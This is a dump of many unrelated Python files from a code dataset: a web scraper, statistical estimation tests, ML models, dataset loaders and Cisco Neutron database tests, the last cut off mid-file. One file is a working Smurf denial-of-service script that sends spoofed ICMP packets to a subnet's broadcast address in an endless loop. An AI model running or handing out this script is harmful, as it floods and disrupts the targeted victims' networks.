id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
192054 | <gh_stars>10-100
"""
=== Web Scraper for pulling environmental clearance data ===
The scraper cycles through every page on the start url
and builds a useable dataset. The website runs on ASP.net
so each page is reached using a form request and posting
javascript arguements.
USE:
* For scraping central data, set page 1 to url_a1 and
post to url_a2, and use the scrape_central function
* For scraping state data, set page 1 and post to url_b
and use the scrape_state function.
"""
# META
__author__ = "<NAME>"
__copyright__ = "Copyright 2016"
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
# Import Libraries
import requests
from bs4 import BeautifulSoup
import os
import pandas as pd
from scrape_functions import *
## Set Parameters
# Set Directory for Writing Data
dir = 'C:/Users/rmadhok/Dropbox (Personal)/EnvironmentalClearances/data'
# Set URLs to follow and scrape
url_a1 = 'http://environmentclearance.nic.in/gotosearch.aspx?pid=ECGranted' #Start url for central data
url_a2 = 'http://environmentclearance.nic.in/Search.aspx' #Post url for next page central data
url_b = 'http://environmentclearance.nic.in/onlinesearch_state_main.aspx?type=EC&status=1' #Start and post url for state data
# Initiate session object
# Persist header for validating next page call
s = requests.Session()
s.headers.update({'user-agent': 'Mozilla/5.0'})
# Initiate Master Data list
data = []
# Scrape Start Page
# --- FOR CENTRAL DATA use url_a1
# --- FOR STATE DATA use url_b
print 'Scraping Page: ' + str(1) + '...'
#r = s.get(url_a1)
r = s.get(url_b)
data += scrape_state(r.content)
# Get Form Data for Page 1
VIEWSTATE, GENERATOR, VALIDATION = getFormData(r.content)
# Scrape All Pages
# --- FOR CENTRAL DATA post to url_a2
# --- FOR STATE DATA post to url_b
lastPage = 320
for page in range(2, lastPage):
try:
print "Scraping Page: " + str(page) + "..."
# Use form data from current page to get next page data
r = s.post(
url_b,
data={
'ww': 'rr|GridView1',
'a': 'rb2',
#'a': 'rb1',
'ddlstatus': 'EC',
#'ddlstatus': 'UPEChome',
'ddlyear': '-All Years-',
'ddlcategory': '-All Category-',
'ddlstate': '-All State-',
'textbox2': '',
#'DropDownList1': 'UPEC',
#'__ASYNCPOST': 'true',
'__EVENTTARGET': 'GridView1',
'__EVENTARGUMENT': 'Page${}'.format(page),
'__VIEWSTATE': VIEWSTATE,
'__VIEWSTATEGENERATOR': GENERATOR,
'__EVENTVALIDATION': VALIDATION,
'__LASTFOCUS': ''
}
)
# Add page data to master
data += scrape_state(r.content)
# Get Current page Form Data
VIEWSTATE, GENERATOR, VALIDATION = getFormData(r.content)
# Exit loop when reach last page
except:
print "Reached last page."
break
# Write to CSV
os.chdir(dir)
data_full = pd.DataFrame(data)
data_full.to_csv('ec_state.csv', encoding = 'utf-8')
| StarcoderdataPython |
1692439 | """Contains the Monte Carlo simulation tests."""
import numpy as np
import copy
from trempy.estimate.estimate_auxiliary import estimate_cleanup
from trempy.shared.shared_auxiliary import print_init_dict
from trempy.config_trempy import PREFERENCE_PARAMETERS
from trempy.tests.test_auxiliary import random_dict
from trempy.custom_exceptions import TrempyError
from trempy.config_trempy import DEFAULT_BOUNDS
from trempy.read.read import ESTIMATION_GROUP
from trempy.estimate.estimate import estimate
from trempy.simulate.simulate import simulate
from trempy.config_trempy import SMALL_FLOAT
from trempy.read.read import read
def basic_dict(version, fname, optimizer, maxfun, num_agents, std=None,
eps=None, ftol=None, gtol=None):
"""Generate basic dictionary for Monte Carlo Simulations."""
constr = {
'version': version, 'fname': fname, 'num_agents': num_agents,
'maxfun': maxfun, 'optimizer': optimizer, 'all_questions': True,
}
init_dict = random_dict(constr)
# Add user-specified std deviations
if std is not None:
for q, sd in std.items():
init_dict['QUESTIONS'][q][0] = sd
# Handle optimizer options
if eps is None:
eps = 1e-05
if ftol is None:
ftol = 1e-08
if gtol is None:
gtol = 1e-08
nuisance_paras = {'eps': eps, 'ftol': ftol, 'gtol': gtol}
for label in ['eps', 'ftol', 'gtol']:
if label in init_dict[optimizer].keys():
init_dict[optimizer][label] = nuisance_paras[label]
return init_dict
def set_questions(init_dict, is_fixed, std=None):
"""Manipulate questions."""
# Change free and fixed status
if is_fixed in ['fix_all']:
for q in init_dict['QUESTIONS'].keys():
init_dict['QUESTIONS'][q][1] = True
else:
np.testing.assert_equal(len(is_fixed), len(init_dict['QUESTIONS'].keys()))
for q, fix_value in enumerate(is_fixed):
init_dict['QUESTIONS'][q][1] = fix_value
# Change standard deviations
if std is not None:
np.testing.assert_equal(len(std), len(init_dict['QUESTIONS'].keys()))
for q, sd in enumerate(std):
init_dict['QUESTIONS'][q][0] = sd
def remove_cutoffs(init_dict):
"""Remove cutoffs."""
init_dict['CUTOFFS'] = dict()
return dict
def estimate_at_truth(fix_question_paras):
"""Stability of the likelihood at the truth."""
estimate_cleanup()
init_dict = basic_dict(version='nonstationary', optimizer='SCIPY-L-BFGS-B', fname='truth',
num_agents=2000, maxfun=1000)
set_questions(init_dict, is_fixed=fix_question_paras, std=None)
seed = init_dict['SIMULATION']['seed']
version = init_dict['VERSION']['version']
print_init_dict(init_dict, fname='truth.trempy.ini')
_, fval = simulate('truth.trempy.ini')
est_output = estimate('truth.trempy.ini')
# Print output
estimated_dict = read('stop/stop.trempy.ini')
results = list()
for group in ESTIMATION_GROUP[version]:
for key in init_dict[group].keys():
start_value, is_fixed, _ = init_dict[group][key]
estimated_value = estimated_dict[group][key][0]
if start_value is None or is_fixed is True:
continue
results.append([seed, fval, est_output[0], key, start_value, estimated_value])
print('{0:<25} {1:<15}'.format('Parameter:', key))
print('-------------------------')
print('{0:<25} {1:5.4f}'.format('Truth:', start_value))
print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
print(' ------------------------- ')
print('sim seed: {:>25}'.format(seed))
print('fval at truth: {:>25}'.format(fval))
print(' ------------------------- ')
return results
def perturbate_econ(init_dict, no_temporal_choices=True, max_dist=None):
"""Perturbate all economic parameters and set bounds to default bounds."""
old_dict = copy.deepcopy(init_dict)
version = init_dict['VERSION']['version']
for group in ESTIMATION_GROUP[version]:
for label in PREFERENCE_PARAMETERS[version]:
if label in init_dict[group].keys():
# Distribute parameters
value, is_fixed, _ = init_dict[group][label]
# Handle optional or unused arguments.
if value is None:
continue
lower, upper = DEFAULT_BOUNDS[label]
# Move the parameter by less than max_dist away.
if max_dist is not None:
new_value = np.random.uniform(value - max_dist, value + max_dist)
new_value = min(upper, new_value)
new_value = max(lower, new_value)
else:
# Get new value
new_value = np.random.uniform(lower, upper)
if group in ['DISCOUNTING'] and no_temporal_choices is True:
is_fixed = True
new_value = value
else:
is_fixed = False
# Update
old_dict[group][label] = [value, is_fixed, [lower, upper]]
init_dict[group][label] = [new_value, is_fixed, [lower, upper]]
return old_dict, init_dict
def pertubation_robustness_all(version, no_temporal_choices=True,
max_dist=None, set_std_to=None):
"""Test pertubation of all parameters."""
# Get random init file
estimate_cleanup()
init_dict = basic_dict(version=version, optimizer='SCIPY-L-BFGS-B', fname='truth',
num_agents=2000, maxfun=1000)
# Set variance for questions
if set_std_to is not None:
for q in init_dict['QUESTIONS'].keys():
init_dict['QUESTIONS'][q][0] = set_std_to
init_dict['QUESTIONS'][q][2] = [set_std_to - SMALL_FLOAT, set_std_to + SMALL_FLOAT]
set_questions(init_dict, is_fixed='fix_all', std=None)
seed = init_dict['SIMULATION']['seed']
version = init_dict['VERSION']['version']
print_init_dict(init_dict, fname='truth.trempy.ini')
# Perturb parameters
truth_dict, perturbed_dict = perturbate_econ(
init_dict, no_temporal_choices=no_temporal_choices, max_dist=max_dist)
print_init_dict(perturbed_dict, fname='perturbed.trempy.ini')
# Simulate data from init file and report criterion function.
_, fval = simulate('truth.trempy.ini')
print('fval at truth: {:>25}'.format(fval))
# Estimate starting from perturbed values
estimate('perturbed.trempy.ini')
estimated_dict = read('stop/stop.trempy.ini')
for group in ESTIMATION_GROUP[version]:
for key in init_dict[group].keys():
start_value, is_fixed, bounds = truth_dict[group][key]
perturbed_value = perturbed_dict[group][key][0]
estimated_value = estimated_dict[group][key][0]
if start_value is None or is_fixed is True:
continue
print('{0:<25} {1:<15}'.format('Parameter:', key))
print('-------------------------')
print('{0:<25} {1:5.4f}'.format('Start:', start_value))
print('{0:<25} {1:5.4f}'.format('Perturbated value:', perturbed_value))
print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
print('Seed: {:>25}'.format(seed))
print('fval_truth: {:>25}'.format(fval))
def perturbate_single(init_dict, label, value=None):
"""Perturbate a single parameter and fix all other parameters for estimation.
We also set the bounds for the perturbed parameter to its default bounds.
This increases the scope for perturbations.
"""
old_dict = copy.deepcopy(init_dict)
version = init_dict['VERSION']['version']
if label not in PREFERENCE_PARAMETERS[version]:
raise TrempyError('Version {0} has no parameters {1}'.format(version, label))
# Fix variance for each question.
for q in init_dict['QUESTIONS'].keys():
init_dict['QUESTIONS'][q][1] = True
# Handle optional parameters
if label.startswith('unrestricted_weights'):
not_used = (None in init_dict['TEMPORAL'].values())
if not_used:
raise TrempyError('Cannot set value for unused argument: {}.'.format(label))
# Fix every parameter except for perturbed one. The perturbed one is "un-fixed".
for group in ESTIMATION_GROUP[version]:
for key in init_dict[group].keys():
current_value, _, bounds = init_dict[group][key]
if key == label:
# Reset bounds to default
lower, upper = DEFAULT_BOUNDS[label]
# If no value is specified, draw a random value.
if value is None:
value = np.random.uniform(lower + SMALL_FLOAT, upper - SMALL_FLOAT)
init_dict[group][key] = [value, False, [lower, upper]]
# Also, override old bounds in old dict.
old_dict[group][key] = [current_value, False, [lower, upper]]
# Fix all other parameters.
else:
init_dict[group][key] = [current_value, True, bounds]
return old_dict, init_dict
def pertubation_robustness_single(version, label=None, value=None, num_agents=None, maxfun=None,
optimizer='SCIPY-BFGS'):
"""Check robustness against single perturbations."""
if label is None:
label = np.random.choice(PREFERENCE_PARAMETERS[version])
# Get random init file
constr = {'version': version, 'fname': 'perturb.start'}
if num_agents is not None:
constr['num_agents'] = num_agents
if maxfun is None:
constr['maxfun'] = 50
else:
constr['maxfun'] = maxfun
init_dict = random_dict(constr)
init_dict['ESTIMATION']['optimizer'] = optimizer
init_dict['SCIPY-POWELL']['ftol'] = 0.1
init_dict['SCIPY-POWELL']['xtol'] = 0.01
init_dict['SCIPY-BFGS']['eps'] = 1.4901161193847656e-08
init_dict['SCIPY-BFGS']['gtol'] = 1e-05
init_dict['SCIPY-L-BFGS-B']['eps'] = 1.4901161193847656e-08
init_dict['SCIPY-L-BFGS-B']['gtol'] = 1.5e-08
init_dict['SCIPY-L-BFGS-B']['ftol'] = 1.5e-08
# Perturb parameters
old_dict, perturbated = perturbate_single(init_dict, label=label, value=value)
# Save dicts
print_init_dict(old_dict, 'perturb.start')
print_init_dict(perturbated, 'perturb.end')
# Simulate data from init file
simulate('perturb.start')
# Estimate starting from perturbed values
estimate('perturb.end')
# os.chdir('stop')
estimated_dict = read('stop/stop.trempy.ini')
# os.chdir('../')
for group in ESTIMATION_GROUP[version]:
for key in init_dict[group].keys():
if key == label:
start_value = old_dict[group][key][0]
perturbed_value = perturbated[group][key][0]
estimated_value = estimated_dict[group][key][0]
print('{0:<25} {1:<15}'.format('Parameter:', label))
print('-------------------------')
print('{0:<25} {1:5.4f}'.format('Start:', start_value))
print('{0:<25} {1:5.4f}'.format('Perturbated value:', perturbed_value))
print('{0:<25} {1:5.4f}'.format('Estimated value:', estimated_value))
| StarcoderdataPython |
3298533 | from __future__ import absolute_import, print_function, division
import os
import glob
import numpy as np
import six
class NfS(object):
"""`NfS <http://ci2cv.net/nfs/index.html>`_ Dataset.
Publication:
``Need for Speed: A Benchmark for Higher Frame Rate Object Tracking``,
<NAME>, <NAME>, <NAME>, <NAME> and <NAME>, ICCV 2017.
Args:
root_dir (string): Root directory of dataset where sequence
folders exist.
fps (integer): Sequence frame rate. Two options ``30`` and ``240``
are available. Default is 240.
"""
def __init__(self, root_dir, fps=240):
super(NfS, self).__init__()
assert fps in [30, 240]
self.fps = fps
self.root_dir = root_dir
self._check_integrity(root_dir)
self.anno_files = sorted(
glob.glob(os.path.join(root_dir, '*/%d/*.txt' % fps)))
self.seq_names = [os.path.basename(f)[:-4] for f in self.anno_files]
self.seq_dirs = [
os.path.join(os.path.dirname(f), n)
for f, n in zip(self.anno_files, self.seq_names)
]
def __getitem__(self, index):
r"""
Args:
index (integer or string): Index or name of a sequence.
Returns:
tuple: (img_files, anno), where ``img_files`` is a list of
file names and ``anno`` is a N x 4 (rectangles) numpy array.
"""
if isinstance(index, six.string_types):
if not index in self.seq_names:
raise Exception('Sequence {} not found.'.format(index))
index = self.seq_names.index(index)
img_files = sorted(
glob.glob(os.path.join(self.seq_dirs[index], '*.jpg')))
anno = np.loadtxt(self.anno_files[index], dtype=str)
anno = anno[:, 1:5].astype(float) # [left, top, right, bottom]
anno[:, 2:] -= anno[:, :2] # [left, top, width, height]
# handle inconsistent lengths
if not len(img_files) == len(anno):
if abs(len(anno) / len(img_files) - 8) < 1:
anno = anno[0::8, :]
diff = abs(len(img_files) - len(anno))
if diff > 0 and diff <= 1:
n = min(len(img_files), len(anno))
anno = anno[:n]
img_files = img_files[:n]
assert len(img_files) == len(anno)
return img_files, anno
def __len__(self):
return len(self.seq_names)
def _check_integrity(self, root_dir):
seq_names = os.listdir(root_dir)
seq_names = [n for n in seq_names if not n[0] == '.']
if os.path.isdir(root_dir) and len(seq_names) > 0:
# check each sequence folder
for seq_name in seq_names:
seq_dir = os.path.join(root_dir, seq_name)
if not os.path.isdir(seq_dir):
print('Warning: sequence %s not exists.' % seq_name)
else:
# dataset not exists
raise Exception('Dataset not found or corrupted.')
| StarcoderdataPython |
5110856 | DEBUG = True
# Database
# 配置 sqlalchemy "数据库驱动://数据库用户名:密码@主机地址:端口/数据库?编码"
SQLALCHEMY_DATABASE_URI = "mysql://root:root@localhost:5000/dbjangoDB"
SQLALCHEMY_TRACK_MODIFICATIONS = True
| StarcoderdataPython |
12827031 | <gh_stars>0
from netaddr import IPNetwork
from scapy.all import ICMP, IP, send
from netattacker.attacker import AttackerBaseClass
class Smurf(AttackerBaseClass):
"""
Parameters
----------
target : str
The target's hostname or IP address
subnet_mask : str
The subnet's CIDR prefix (eg., 24)
Methods
-------
compute_broadcast_addr()
Returns the broadcast address of the target subnet
print_broadcast_addr()
Prints the broadcast address of the target subnet
start()
Sends spoofed ICMP packets to the target broadcast address
"""
def __init__(self, target:str, subnet_mask:str):
"""
Parameters
----------
target : str
The target's hostname or IP address
subnet_mask : str
The subnet's CIDR prefix (eg., 24)
"""
super().__init__(target, attack="SMURF")
self.broadcast_ipv4 = self.compute_broadcast_addr(subnet_mask)
def compute_broadcast_addr(self, subnet_mask:str) -> str:
"""Returns the broadcast address of the target subnet"""
addr = (IPNetwork(self.target_ipv4+"/"+subnet_mask)).broadcast
return str(addr)
def print_broadcast_addr(self):
"""Prints the broadcast address of the target subnet"""
print("[*] The target broadcast address: {}".format(self.broadcast_ipv4))
def start(self):
"""Sends spoofed ICMP packets to the target broadcast address"""
pkt = IP(src=self.target_ipv4, dst=self.broadcast_ipv4)/ICMP()
print("[*] SMURF attack started")
send(pkt, verbose=False, loop=True)
def main():
a = Smurf("192.168.1.2", "24")
a.print_broadcast_addr()
a.print_target_ip()
a.start()
if __name__ == "__main__":
main() | StarcoderdataPython |
4998191 | # -*- coding: utf-8 -*-
import os
import uuid
from fast_ani_output import create_html_tables
from DataFileUtil.DataFileUtilClient import DataFileUtil
from KBaseReport.KBaseReportClient import KBaseReport
# This module handles creating a KBase report object from fast_ani_output html
def create_report(callback_url, scratch, workspace_name, result_data):
"""
Create KBase extended report object for the output html
"""
html = create_html_tables(result_data)
dfu = DataFileUtil(callback_url)
report_name = 'fastANI_report_' + str(uuid.uuid4())
report_client = KBaseReport(callback_url)
html_dir = os.path.join(scratch, report_name)
os.mkdir(html_dir)
# Move all pdfs into the html directory
for result in result_data:
if os.path.exists(result['viz_path']):
os.rename(result['viz_path'], os.path.join(html_dir, result['viz_filename']))
with open(os.path.join(html_dir, "index.html"), 'w') as file:
file.write(html)
shock = dfu.file_to_shock({
'file_path': html_dir,
'make_handle': 0,
'pack': 'zip'
})
html_file = {
'shock_id': shock['shock_id'],
'name': 'index.html',
'label': 'html_files',
'description': 'FastANI HTML report'
}
report = report_client.create_extended_report({
'direct_html_link_index': 0,
'html_links': [html_file],
'report_object_name': report_name,
'workspace_name': workspace_name
})
return {
'report_name': report['name'],
'report_ref': report['ref']
}
| StarcoderdataPython |
3322458 | import numpy as np
try:
import dgl
import torch.nn as nn
import torch.nn.functional as F
from dgl.nn.pytorch import GraphConv
except ImportError:
pass
from photonai_graph.NeuralNets.dgl_base import DGLRegressorBaseModel, DGLClassifierBaseModel
class GCNClassifier(nn.Module):
def __init__(self, in_dim, hidden_dim, n_classes, hidden_layers, allow_zero_in_degree):
super(GCNClassifier, self).__init__()
self.layers = nn.ModuleList()
# input layers
self.layers.append(GraphConv(in_dim, hidden_dim, allow_zero_in_degree=allow_zero_in_degree))
# hidden layers
for layer in range(1, hidden_layers):
self.layers.append(GraphConv(hidden_dim, hidden_dim, allow_zero_in_degree=allow_zero_in_degree))
self.classify = nn.Linear(hidden_dim, n_classes)
def forward(self, g):
# Use node degree as the initial node feature. For undirected graphs, the in-degree
# is the same as the out_degree.
h = g.in_degrees().view(-1, 1).float()
# Perform graph convolution and activation function.
for i, gnn in enumerate(self.layers):
h = F.relu(gnn(g, h))
g.ndata['h'] = h
# Calculate graph representation by averaging all the node representations.
hg = dgl.mean_nodes(g, 'h')
return self.classify(hg)
class GCNClassifierModel(DGLClassifierBaseModel):
def __init__(self,
in_dim: int = 1,
hidden_layers: int = 2,
hidden_dim: int = 256,
nn_epochs: int = 200,
learning_rate: float = 0.001,
batch_size: int = 32,
adjacency_axis: int = 0,
feature_axis: int = 1,
add_self_loops: bool = True,
allow_zero_in_degree: bool = False,
logs: str = ''):
"""
Graph Attention Network for graph classification. GCN Layers
from Kipf & Welling, 2017.
Implementation based on dgl & pytorch.
Parameters
----------
in_dim: int,default=1
input dimension
hidden_layers: int,default=2
number of hidden layers used by the model
hidden_dim: int,default=256
dimensions in the hidden layers
"""
super(GCNClassifierModel, self).__init__(nn_epochs=nn_epochs,
learning_rate=learning_rate,
batch_size=batch_size,
adjacency_axis=adjacency_axis,
feature_axis=feature_axis,
add_self_loops=add_self_loops,
allow_zero_in_degree=allow_zero_in_degree,
logs=logs)
self.in_dim = in_dim
self.hidden_dim = hidden_dim
self.hidden_layers = hidden_layers
def _init_model(self, X=None, y=None):
self.model = GCNClassifier(self.in_dim,
self.hidden_dim,
len(np.unique(y)),
self.hidden_layers,
allow_zero_in_degree=self.allow_zero_in_degree)
class GCNRegressorModel(DGLRegressorBaseModel):
def __init__(self,
in_dim: int = 1,
hidden_layers: int = 2,
hidden_dim: int = 256,
nn_epochs: int = 200,
learning_rate: float = 0.001,
batch_size: int = 32,
adjacency_axis: int = 0,
feature_axis: int = 1,
add_self_loops: bool = True,
allow_zero_in_degree: bool = False,
logs: str = ''):
"""
Graph convolutional Network for graph regression. GCN Layers
from Kipf & Welling, 2017. Implementation based on dgl & pytorch.
Parameters
----------
in_dim: int,default=1
input dimension
hidden_layers: int,default=2
number of hidden layers used by the model
hidden_dim: int,default=256
dimensions in the hidden layers
"""
super(GCNRegressorModel, self).__init__(nn_epochs=nn_epochs,
learning_rate=learning_rate,
batch_size=batch_size,
adjacency_axis=adjacency_axis,
feature_axis=feature_axis,
add_self_loops=add_self_loops,
allow_zero_in_degree=allow_zero_in_degree,
logs=logs)
self.in_dim = in_dim
self.hidden_dim = hidden_dim
self.hidden_layers = hidden_layers
def _init_model(self, X=None, y=None):
self.model = GCNClassifier(self.in_dim,
self.hidden_dim, 1,
self.hidden_layers,
allow_zero_in_degree=self.allow_zero_in_degree).float()
| StarcoderdataPython |
6475711 | <reponame>cliche-niche/model-zoo
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
from tensorflow.keras import activations
from tensorflow.keras import regularizers
from stage import stage
class repvgg(tf.keras.Model):
def __init__(self, a=0.75, b=2.5, l=[1, 2, 4, 14, 1], nc=10):
# default A0 architecture training on CIFAR-10 dataset
super(repvgg, self).__init__()
"""
a:= Same purpose as that in paper, used for number of channels
b:= Same purpose as that in paper, used for number of channels
l:= The number of layers per stage
nc:= The total number of classifications of dataset
Model consists of a layer for augmentation, followed by 5 stages, and by a
Global Average Pooling layer and a fully connected layer
"""
self.aug = tf.keras.Sequential(
[
layers.experimental.preprocessing.RandomCrop(32, 32),
layers.experimental.preprocessing.RandomFlip("horizontal_and_vertical"),
]
)
self.st = []
self.l = l
self.f = [min(64, 64 * a), 64 * a, 128 * a, 256 * a, 512 * b]
for i in range(5):
self.st.append(stage(self.f[i], l[i]))
self.gap = layers.GlobalAveragePooling2D()
self.end = layers.Dense(
units=nc, activation="softmax", kernel_regularizer=regularizers.l2(1e-4)
)
def call(self, inp):
x = self.aug(inp)
for i in range(5):
x = self.st[i](x)
x = self.gap(x)
x = self.end(x)
return x
def model(self, inp):
# Can be used for printing model summary
x = layers.Input(shape=inp[0].shape)
return tf.keras.Model(inputs=x, outputs=self.call(x))
def repara(self):
for i in range(5):
self.st[i].repara()
return
| StarcoderdataPython |
9626929 | import os
from torchvision import transforms
import mask_utils.transforms as T
def parse_config(path):
class_to_ids = dict()
assert os.path.exists(path)
with open(path, "r") as f:
lines = f.readlines()
for id, line in enumerate(lines):
line = line.strip().lower()
class_to_ids[line] = id+1
assert len(class_to_ids) >= 1
return class_to_ids
def collate_fn(batch):
return tuple(zip(*batch))
def get_transform(model, train):
transform = []
if model.lower() == "maskrcnn":
transform.append(T.ToTensor())
if train:
transform.append(T.RandomHorizontalFlip(0.5))
else:
preprocess = transforms.Compose([
transforms.Resize((1024, 1024)),
transforms.ToTensor(),
])
return preprocess
return T.Compose(transform)
| StarcoderdataPython |
11217396 | <filename>pinn/losses.py
import numpy as np
np.random.seed(0)
class BinaryCrossEntropy:
def __init__(self):
pass
def derivative(self, y, y_pred):
return -(y/y_pred + (1-y)/(1-y_pred))/y.shape[0]
def loss(self, y, y_pred):
return -np.sum(y*np.log(1-y_pred) + (1-y)*np.log(1-y_pred))/y.shape[0]
| StarcoderdataPython |
4876096 | from distutils.core import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="etoro_edavki",
version="1.0.0",
py_modules=["etoro_edavki"],
python_requires=">=3",
entry_points={
"console_scripts": ["etoro_edavki=etoro_edavki:main", "etoro-edavki=etoro_edavki:main"]
},
author="<NAME>",
)
| StarcoderdataPython |
1829383 | <filename>neutron/tests/unit/cisco/test_network_db.py
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
import testtools
from neutron.db import api as db
from neutron.plugins.cisco.common import cisco_constants
from neutron.plugins.cisco.common import cisco_credentials_v2
from neutron.plugins.cisco.common import cisco_exceptions as c_exc
from neutron.plugins.cisco.common import config as config
from neutron.plugins.cisco.db import network_db_v2 as cdb
from neutron.plugins.cisco import network_plugin
from neutron.tests import base
class CiscoNetworkDbTest(base.BaseTestCase):
"""Base class for Cisco network database unit tests."""
def setUp(self):
super(CiscoNetworkDbTest, self).setUp()
db.configure_db()
# The Cisco network plugin includes a thin layer of QoS and
# credential API methods which indirectly call Cisco QoS and
# credential database access methods. For better code coverage,
# this test suite will make calls to the QoS and credential database
# access methods indirectly through the network plugin. The network
# plugin's init function can be mocked out for this purpose.
def new_network_plugin_init(instance):
pass
with mock.patch.object(network_plugin.PluginV2,
'__init__', new=new_network_plugin_init):
self._network_plugin = network_plugin.PluginV2()
self.addCleanup(db.clear_db)
class CiscoNetworkQosDbTest(CiscoNetworkDbTest):
"""Unit tests for Cisco network QoS database model."""
QosObj = collections.namedtuple('QosObj', 'tenant qname desc')
def _qos_test_obj(self, tnum, qnum, desc=None):
"""Create a Qos test object from a pair of numbers."""
if desc is None:
desc = 'test qos %s-%s' % (str(tnum), str(qnum))
tenant = 'tenant_%s' % str(tnum)
qname = 'qos_%s' % str(qnum)
return self.QosObj(tenant, qname, desc)
def _assert_equal(self, qos, qos_obj):
self.assertEqual(qos.tenant_id, qos_obj.tenant)
self.assertEqual(qos.qos_name, qos_obj.qname)
self.assertEqual(qos.qos_desc, qos_obj.desc)
def test_qos_add_remove(self):
qos11 = self._qos_test_obj(1, 1)
qos = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
qos11.desc)
self._assert_equal(qos, qos11)
qos_id = qos.qos_id
qos = self._network_plugin.delete_qos(qos11.tenant, qos_id)
self._assert_equal(qos, qos11)
qos = self._network_plugin.delete_qos(qos11.tenant, qos_id)
self.assertIsNone(qos)
def test_qos_add_dup(self):
qos22 = self._qos_test_obj(2, 2)
qos = self._network_plugin.create_qos(qos22.tenant, qos22.qname,
qos22.desc)
self._assert_equal(qos, qos22)
qos_id = qos.qos_id
with testtools.ExpectedException(c_exc.QosNameAlreadyExists):
self._network_plugin.create_qos(qos22.tenant, qos22.qname,
"duplicate 22")
qos = self._network_plugin.delete_qos(qos22.tenant, qos_id)
self._assert_equal(qos, qos22)
qos = self._network_plugin.delete_qos(qos22.tenant, qos_id)
self.assertIsNone(qos)
def test_qos_get(self):
qos11 = self._qos_test_obj(1, 1)
qos11_id = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
qos11.desc).qos_id
qos21 = self._qos_test_obj(2, 1)
qos21_id = self._network_plugin.create_qos(qos21.tenant, qos21.qname,
qos21.desc).qos_id
qos22 = self._qos_test_obj(2, 2)
qos22_id = self._network_plugin.create_qos(qos22.tenant, qos22.qname,
qos22.desc).qos_id
qos = self._network_plugin.get_qos_details(qos11.tenant, qos11_id)
self._assert_equal(qos, qos11)
qos = self._network_plugin.get_qos_details(qos21.tenant, qos21_id)
self._assert_equal(qos, qos21)
qos = self._network_plugin.get_qos_details(qos21.tenant, qos22_id)
self._assert_equal(qos, qos22)
with testtools.ExpectedException(c_exc.QosNotFound):
self._network_plugin.get_qos_details(qos11.tenant, "dummyQosId")
with testtools.ExpectedException(c_exc.QosNotFound):
self._network_plugin.get_qos_details(qos11.tenant, qos21_id)
with testtools.ExpectedException(c_exc.QosNotFound):
self._network_plugin.get_qos_details(qos21.tenant, qos11_id)
qos_all_t1 = self._network_plugin.get_all_qoss(qos11.tenant)
self.assertEqual(len(qos_all_t1), 1)
qos_all_t2 = self._network_plugin.get_all_qoss(qos21.tenant)
self.assertEqual(len(qos_all_t2), 2)
qos_all_t3 = self._network_plugin.get_all_qoss("tenant3")
self.assertEqual(len(qos_all_t3), 0)
def test_qos_update(self):
qos11 = self._qos_test_obj(1, 1)
qos11_id = self._network_plugin.create_qos(qos11.tenant, qos11.qname,
qos11.desc).qos_id
self._network_plugin.rename_qos(qos11.tenant, qos11_id,
new_name=None)
new_qname = "new qos name"
new_qos = self._network_plugin.rename_qos(qos11.tenant, qos11_id,
new_qname)
expected_qobj = self.QosObj(qos11.tenant, new_qname, qos11.desc)
self._assert_equal(new_qos, expected_qobj)
new_qos = self._network_plugin.get_qos_details(qos11.tenant, qos11_id)
self._assert_equal(new_qos, expected_qobj)
with testtools.ExpectedException(c_exc.QosNotFound):
self._network_plugin.rename_qos(qos11.tenant, "dummyQosId",
new_name=None)
class CiscoNetworkCredentialDbTest(CiscoNetworkDbTest):
"""Unit tests for Cisco network credentials database model."""
CredObj = collections.namedtuple('CredObj', 'cname usr pwd ctype')
def _cred_test_obj(self, tnum, cnum):
"""Create a Credential test object from a pair of numbers."""
cname = 'credential_%s_%s' % (str(tnum), str(cnum))
usr = 'User_%s_%s' % (str(tnum), str(cnum))
pwd = 'Password_%s_%s' % (str(tnum), str(cnum))
ctype = 'ctype_%s' % str(tnum)
return self.CredObj(cname, usr, pwd, ctype)
def _assert_equal(self, credential, cred_obj):
self.assertEqual(credential.type, cred_obj.ctype)
self.assertEqual(credential.credential_name, cred_obj.cname)
self.assertEqual(credential.user_name, cred_obj.usr)
self.assertEqual(credential.password, cred_obj.pwd)
def test_credential_add_remove(self):
cred11 = self._cred_test_obj(1, 1)
cred = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype)
self._assert_equal(cred, cred11)
cred_id = cred.credential_id
cred = cdb.remove_credential(cred_id)
self._assert_equal(cred, cred11)
cred = cdb.remove_credential(cred_id)
self.assertIsNone(cred)
def test_credential_add_dup(self):
cred22 = self._cred_test_obj(2, 2)
cred = cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype)
self._assert_equal(cred, cred22)
cred_id = cred.credential_id
with testtools.ExpectedException(c_exc.CredentialAlreadyExists):
cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype)
cred = cdb.remove_credential(cred_id)
self._assert_equal(cred, cred22)
cred = cdb.remove_credential(cred_id)
self.assertIsNone(cred)
def test_credential_get_id(self):
cred11 = self._cred_test_obj(1, 1)
cred11_id = cdb.add_credential(
cred11.cname, cred11.usr, cred11.pwd, cred11.ctype).credential_id
cred21 = self._cred_test_obj(2, 1)
cred21_id = cdb.add_credential(
cred21.cname, cred21.usr, cred21.pwd, cred21.ctype).credential_id
cred22 = self._cred_test_obj(2, 2)
cred22_id = cdb.add_credential(
cred22.cname, cred22.usr, cred22.pwd, cred22.ctype).credential_id
cred = self._network_plugin.get_credential_details(cred11_id)
self._assert_equal(cred, cred11)
